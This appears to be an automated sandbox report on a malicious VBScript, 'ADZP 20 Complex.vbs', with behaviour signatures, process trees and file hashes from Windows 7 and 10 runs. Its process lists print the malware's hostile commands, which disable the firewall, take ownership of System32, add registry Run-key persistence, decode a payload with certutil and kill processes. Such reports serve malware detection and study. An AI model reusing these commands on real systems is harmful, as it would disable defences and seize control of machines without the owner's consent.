Analysis Overview
SHA256
d6607a9ec5fc0698f50382ffe61a4ad1f36a8b26c0834c305f40e41647980668
Threat Level: Likely malicious
The file ADZP 20 Complex.vbs was found to be: Likely malicious.
Malicious Activity Summary
Modifies Windows Firewall
Possible privilege escalation attempt
Reads user/profile data of web browsers
Modifies file permissions
Checks computer location settings
Drops file in System32 directory
Drops autorun.inf file
Drops file in Windows directory
Enumerates physical storage devices
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Gathers network information
Kills process with taskkill
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-25 17:09
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-25 17:09
Reported
2024-05-25 17:12
Platform
win10v2004-20240508-en
Max time kernel
14s
Max time network
151s
Command Line
Signatures
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Reads user/profile data of web browsers
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\calc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\TempShingapi.sk.bat" "
C:\Windows\system32\certutil.exe
certutil -decode x.bin ADZP-20-Complex.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\certutil.exe
certutil -encode "C:\Windows\System32\Twain_20.dll" "C:\Users\Admin\AppData\Local\Temp\Twain_20.dll"
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | 4ebefa3fb0a3daf47a30ef9ba799e6ef |
| SHA1 | 6b212dece7aa7c7cbcd5e6d4985bee011a73e195 |
| SHA256 | 332b6eda651a87b03c52be1216b2158c8f80e153ebc6f366d03cfefd42778a18 |
| SHA512 | a19d4148e8d6ef734543cbf5474449bf9aec2c1b4defb7a69f703e757acf25d6142f787a1681c201affa816a6caa6bd7ab84ce29cb8e6a9e81c77452491dd75a |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 8761f97b782a318e8fba7bc8018aa478 |
| SHA1 | 95984e4969a9aa8862139900838fdaf232c46fa4 |
| SHA256 | 47177adad71b234fdd77c0f2b5977d4766ccc59867d37e50188b02a66cadbc60 |
| SHA512 | d90862ea2d112ac605bd76823216f31daa8b60ff1d434fcbe9f04832e9d541760458e5ebbf7ce9561be42d18e0a11800b702adabfddf3bbaed08d867a5df88d6 |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 4d8b24ab53e9685096c46046ea3f20b1 |
| SHA1 | 650e5d2e2a2f263657107385b5ef87f678f36510 |
| SHA256 | 172d9d0ba529cee20b666f3b1a778801fcb24daf4c1f88e6b45312e5df16e0d6 |
| SHA512 | aa3290d3edbd16180643152d0bd6785177b372b4ba7e3ae9a1eb6fd91281ec5fec7caef839a2734430070e76629f7ce187a6f1f1921a21f01dca2583e89b535e |
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | 635f90a82ff6dbb6aff1417d860ec5b3 |
| SHA1 | b633c59fbb61d20b46608be4cd8fa10458ee8936 |
| SHA256 | 3597d1266ec0e455a0cd53c57a8fd695090c0aca2611df1a179f7eb99365daed |
| SHA512 | e175266746229df627520615a3ddde80bfe5724b0d6a5fc854ab7e223d71681b241fa3bf807bf4989530a090514a62c7b9f40fa85be590a6fe9c4aa7b56e523c |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | baa511e0932e6c0781dd1488615d17a6 |
| SHA1 | e3218aefe8c272ade02eb6cc5188df6d50b04de0 |
| SHA256 | 20fa853d5be5b8f30eeb6ae3e24558a2091d80102944ab26b9861df5cea6c6fa |
| SHA512 | 24be7fabda63dd82dfb5307e2ae0dc7176bf59c0918f1316bddb7515e0695b10cd6e24420af4afcda3d5f1b01e3d540a2d75a629f40c381da05eb3c28ff4697e |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 81a24f8120fa35b69363a40cf5ec5a33 |
| SHA1 | c27b56e4dea4dfbb9d72dff110213897c9dfb549 |
| SHA256 | d8c095c9c445be47143b9f5cfc5b1e83b74ef6bcfa40f03c015e49ea61e57fb4 |
| SHA512 | f001bda4be38166c62166b69fa4db1d47add0890a399b57e548e459782ec763f96e7a59c2bab810eb2cd6d085124e5f375d00206cf12e2eff2adafb8746eb54e |
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
| MD5 | 9905e5a33c6edd8eb5f59780afbf74de |
| SHA1 | 64b2cd0186ff6fe05072ee88e2bb54476023772e |
| SHA256 | c134b2f85415ba5cfce3e3fe4745688335745a9bb22152ac8f5c77f190d8aee3 |
| SHA512 | e10711d0fb09db27192e9af05ae45b83cf3882d98e904a7f1f969cf24c2f9626f70f35d76f57477fe9c64a58bc74100410740e9d506d4e72d3e2900d6277816e |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 0fdd76e3cf93e100def34ac33e62a516 |
| SHA1 | 88195f2f8182b2e70baa3909f3cdd0b8b645ff1e |
| SHA256 | 739819fe4b44a84491146a20870aa3f4605cc7e386d4274beb5615b39d95baac |
| SHA512 | 66843347dc861cc7f27b86b5fd9a11abc427b583333562393674e83df04dd03d92d25c61ba7e8f5747867d57dd749bd0ae6f1a551a35b98c4a91be2039d33992 |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | fe669e0a3a56961fba38ef9b7f7d01dd |
| SHA1 | 338b6f4a3ec71587d53aec450ca5448928f966a1 |
| SHA256 | 138b48a413afa60daa506090fa4332d913a1f9d895b6c289c36dd7db00019d64 |
| SHA512 | ff0bc50cef59421253578172602a56f9f9b3a8988a16576eaf8a004792d330c708dbed95f5f4074fb2eec36d7df7f4a0392c88420d2b0678cd907056a23cd41b |
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
| MD5 | 0eafc7e411bc95b074c8ea60b00b1f6c |
| SHA1 | 7a63173a486dd28e4159716b19b0ff838a6bfae1 |
| SHA256 | 45b48741270f8f74abbb703bf41496ae1a447ce659cee66e4583e6f96e82617a |
| SHA512 | fb71f2f1d0e05202420a1426f8e5d509f645a613c2d20d64c5d78a559f0bca7f8067e9be4665c6c2a21e7c3aa836238872430903ebd821063e1bcfbb38d404a4 |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | ea260c435f9eb83e2b5041e734ff3598 |
| SHA1 | ca70d64367cbdffbbf24e82baff4048119203a2e |
| SHA256 | 3ade659fdae17c11c3f42b712f94045691fbd0b413428b73e1de8fe699e74615 |
| SHA512 | 548624cc523aeb4136376f792d23b3f2aee4a676362f8a0dd0e8161f0df87ab926b82f67fc174eb5d9473c23f49e6ca962bc84479967f7e624250d94efa66876 |
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
| MD5 | 401e4eb249071b70f56d18e942ae7df2 |
| SHA1 | f3820c8c3ecf2443504736023fc0ce252d06e19c |
| SHA256 | 33413957207bff35858e95b3d8a54bf2b9e7d20882a4a62366946cfd960dbe73 |
| SHA512 | 196e7ef12447e97e3be7a7c20fd69d0d1377364def9059e8eacf05a98a003fdc0470c9e88f662d38db7c54c24135d165bbe59f32b49aaeba5e91e6941725edf6 |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | a90843e895d5444355e06c5625dfb613 |
| SHA1 | 73a92d3ea21c281e5b1ab7ef031aaa9ebe625a78 |
| SHA256 | 1e9580a9b253391ef655633ca06449ec9e0751db1ae42300251d36d826f4109a |
| SHA512 | ed92df803418702ffdbc3e9c5beb7874249d418802cd1e1dd9e56d521c3fe3cb055a55fa6d2095127f4e040df95997f64abe0ec2fbbf5f5b45a0054547e2a900 |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | 637146c9cb84c3e925310c222aa66e6c |
| SHA1 | cfe2e60346bfb08b9c93d3cc8511ec5a0f732846 |
| SHA256 | b266da1e37993f333dc287ceabb7bf0b61ad2750c1d0ad4e7fcb2be5597ca88c |
| SHA512 | 8e76d9cb7474912624d8d76ee6b72c33d57d776ebfba0ff27df08fe14c87322e272ea105bbcb3a3e1aef34d953ccc5b83603ec19c3d517caacc514ba78029329 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-25 17:09
Reported
2024-05-25 17:12
Platform
win7-20240508-en
Max time kernel
11s
Max time network
119s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\System32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Twain_20.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.vbs"
C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\TempShingapi.sk.bat" "
C:\Windows\system32\certutil.exe
certutil -decode x.bin ADZP-20-Complex.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1255964061-544150849-16573972111863020607-1660537181-13153820881570418774660387703"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
